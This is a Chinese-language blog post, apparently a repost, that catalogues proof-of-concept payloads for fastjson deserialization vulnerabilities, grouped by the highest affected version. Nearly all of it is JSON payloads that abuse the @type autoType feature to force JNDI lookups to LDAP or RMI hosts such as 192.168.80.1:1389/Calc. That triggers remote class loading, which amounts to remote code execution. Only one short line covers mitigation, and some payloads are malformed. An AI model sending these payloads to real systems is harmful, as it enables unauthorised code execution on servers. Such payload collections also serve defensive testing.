  • fastjson 反序列化漏洞

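    一.漏洞POC

    以下各组 payload 都是借助 `@type`(autoType)让 fastjson 实例化一个会发起 JNDI(ldap:// 或 rmi://)查询的类;小标题中的版本号表示该 payload 可影响的最高版本。防护上应升级 fastjson 并关闭 autoType(或启用 safeMode),同时限制应用服务器对外的 LDAP/RMI 出站连接。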

    fastjson<=1.2.24(CNVD-2017-02833)

    {"v24":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://0.0.0.0","autoCommit":true}}
    

    fastjson<=1.2.41

    {"v41":{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"ldap://0.0.0.0","autoCommit":true}}
    
    

    fastjson<=1.2.42

    {"v42":{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://0.0.0.0","autoCommit":true}}
    
    

    fastjson<=1.2.43

    {"v43":{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{"dataSourceName":"ldap://0.0.0.0","autoCommit":true]}}}
    

    fastjson<=1.2.45

    {"v45":{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://localhost:1389/Exploit"}}}
    
    {
    "v45":{"@type":"java.lang.Class","val":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory"},
    "xxx":{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://0.0.0.0"}}
    }
    
    

    fastjson<=1.2.47(CNVD-2019-22238)

    {
        "a": {
            "@type": "java.lang.Class", 
            "val": "com.sun.rowset.JdbcRowSetImpl"
        }, 
        "b": {
            "@type": "com.sun.rowset.JdbcRowSetImpl", 
            "dataSourceName": "rmi://x.x.x.x:1098/jndi", 
            "autoCommit": true
        }}
    
    {
    "v47":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},
    "xxx":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://0.0.0.0","autoCommit":true}
    }
    

    fastjson<=1.2.61

    {"v61_error":{"@type":"org.apache.commons.proxy.provider.remoting.SessionBeanProvider","jndiName":"rmi://127.0.0.1"}}
    
    {"v61_error":{"@type":"org.apache.commons.proxy.provider.remoting.SessionBeanProvider","jndiName":"ldap://127.0.0.1","Object":"a"}}
    

    fastjson<=1.2.62

    {"aaaa":{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://127.0.0.1:1099/exploit"}";}
    
    {"v62":{"@type":"org.apache.xbean.propertyeditor.JndiConverter","asText":"ldap://0.0.0.0"}}
    
    {"v62_error":{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://0.0.0.0"}}}
    
    {"v62_error":{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"ldap://0.0.0.0"}}
    
    {"v62_error":{"@type":"org.apache.cocoon.components.slide.impl.JMSContentInterceptor","parameters": {"@type":"java.util.Hashtable","java.naming.factory.initial":"com.sun.jndi.rmi.registry.RegistryContextFactory","topic-factory":"ldap://0.0.0.0"},"namespace":""}}
    
    

    fastjson<=1.2.66

    {"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://192.168.80.1:1389/Calc"}
    {"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://192.168.80.1:1389/Calc"}
    {"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://192.168.80.1:1389/Calc"}
    {"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://192.168.80.1:1389/Calc"}}
    
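    写文件覆盖方法(注:从内容看,下面两条 payload 仍是经 HikariConfig 的 metricRegistry / healthCheckRegistry 属性触发的 JNDI 查询,与"写文件"这一标题不符,原文此处可能有遗漏)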
    {"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","metricRegistry":"ldap://0.0.0.0"}{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","healthCheckRegistry":"ldap://0.0.0.0"}
    
  • 原文地址:https://www.cnblogs.com/supdon/p/15099751.html